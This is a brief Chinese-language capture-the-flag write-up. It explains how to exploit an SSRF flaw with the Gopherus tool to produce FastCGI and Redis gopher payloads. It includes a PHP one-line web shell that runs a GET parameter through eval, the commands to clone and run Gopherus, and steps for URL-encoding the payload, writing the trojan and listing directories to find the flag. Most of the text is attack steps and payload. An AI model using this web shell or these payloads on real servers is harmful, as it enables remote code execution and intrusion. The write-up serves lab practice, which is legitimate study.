将木马进行base64编码
<?php @eval($_GET[cmd]);?>
打开kali虚拟机,使用虚拟机中Gopherus-master工具
Gopherus-master工具安装
git clone https://github.com/tarunkant/Gopherus.git
进入工具目录
cd Gopherus
使用工具
python2 "位置" --exploit fastcgi
将得到的数据进行url编码
放到url=后面得到图下代表成功
打开文件,使用ls ../一级一级找flag
使用得到的flag_得到
打开kali虚拟机,使用虚拟机中Gopherus-master工具
python2 "位置” --exploit redis
将结果进行url编码
将数据放到url=后面
显示504不重要,重要的是木马有没有写进去
